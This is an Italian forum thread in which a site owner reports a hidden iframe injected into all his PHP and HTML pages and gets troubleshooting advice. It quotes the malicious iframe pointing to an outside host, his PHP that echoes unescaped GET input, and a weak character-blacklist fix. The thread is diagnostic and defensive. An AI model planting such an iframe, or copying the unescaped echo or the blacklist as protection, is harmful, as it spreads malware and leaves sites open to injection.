ho subito un XSS??

[Concetto80]

Spero di essere nella sezione giusta. In generale riesco a trovare sempre soluzioni cercando, ma questa volta niente.
Arrivo al dunque...

Questa mattina apro il mio sito (su altervista) e trovo in ogni pagina il seguente codice:

codice:

<iframe src="			http://aarqh.dnepr.com/images.php?t=41823046"></iframe></body></html>

In base al tipo di pagina lo trovo in posizioni diverse, nelle pagine .php nel tag di chiusura tra ? e >. Nelle pagine di semplice html, lo trovo subito dopo la chiusura dell'head.

Visto che non c'è un database e che c'è un unica form (che uso solo io per l'upload delle immagini) che non permette l'immissione di tag.
Mi chiedo.. come è possibile? e come posso fare per evitare che accada di nuovo?

grazie mille per l'eventuale risposta.

[eiyen]

non ho abbastanza info, però puoi fare dei controlli:
- verifica se ci sono files NON intaccati
- controlla data e ora di variazione dei files
- se hai accesso a un qualche log del server controllalo

[Concetto80]

grazie mille per l'attenzione.
Allora:

Sono stati toccati solo i file php e html, mentre tutti i js, immagini e pdf non sono stati toccati.
Nel sito ci sono veramente tanti file e sono stati modificati tutti i php/html.

Ancora devo vedere i log perchè (aimè) stò dovendo sistemare tutti i file e mi stà prendendo veramente tanto tempo. Da una prima occhiata ai log non vedo nulla di sospetto, anche se bisognerebbe sapere cosa cercare.

Comunque ricordo che qualche mese fa era successa una cosa analoga, solo che era comparso solo un tag di chiusura head, che sballava tutte le pagine. Al tempo pensai qualcosa andato storto dal lato di altervista (essendo in tutti i file).

Per il momento ho tolto tutte le form per inserire dati, anche quelle di file che non fanno parte di nessun sito ma erano li per prove fatte da me.

[eiyen]

beh puoi fare qualche controllo rapido tipo: verifica se i file hanno una data di modifica simile per tutti quanti e se sì guarda i log intorno a tale istante

[Concetto80]

si.

stavo proprio cercando di risalire all'ora della modifica.

Mi è venuta un idea o meglio un dubbio.

Tra una pagina e un altra viene passato del semplice testo via url e prelevato con un get. Su questo testo non viene effettuato nessun controllo.
Può essere che è stato inserito del codice direttamente nell'url?

p.s.

non riesco a vedere a che ora è stato modificato il file

[Concetto80]

Per il momento ho fatto una soluzione del genere:

codice:

 $chrs = "/'_£$%&<>¿{}=?^!]-";  
if (preg_match('/['.preg_quote($chrs,'/').']/',$se))       header('Location: correggi.html');   
     if (preg_match('/['.preg_quote($chrs,'/').']/',$testo))       header('Location: correggi.html');

secondo voi va bene?

[eiyen]

ma dove usi la variabile "letta" così? cmq prova direttamente mettendo (prima e poi dopo le modifiche) un testo che contenga "codice" e verifica cosa accade.

Puoi anche fare una cosa tipo $txt = preg_replace('/[^(\x20a-zA-Z0-9)]*/','', $txt); che "tiene" solo spazi, lettere e numeri (eventualm. aggiungi quel che vuoi)

[Concetto80]

fatto... speriamo che basti, comunque grazie mille

Ora vorrei riuscire a capire come è possibile che sia avvenuto. bhò!?!?!?

[eiyen]

il "testo" preso dalla querystring come veniva utilizzato? con quali istruzioni? c'era per esempio un "semplice" print $testo; o cos'altro?

[Concetto80]

ciao...

il testo viene utilizzato con:

Codice PHP:

echo ("<P  class='bio' ALIGN='left' > [b]<font color='#00BFFF'>$se:</font><span class='media'> $testo "." pm "." <font color='#00BFFF'>$medi</font> </span>[/b] </p>"); 


quindi con un echo... ma quello che non riesco a capire è come l'iframe sia comparso in ogni file php/html del mio spazio. Ma proprio in tutti e non solo nella pagina che raccoglieva la variabile $testo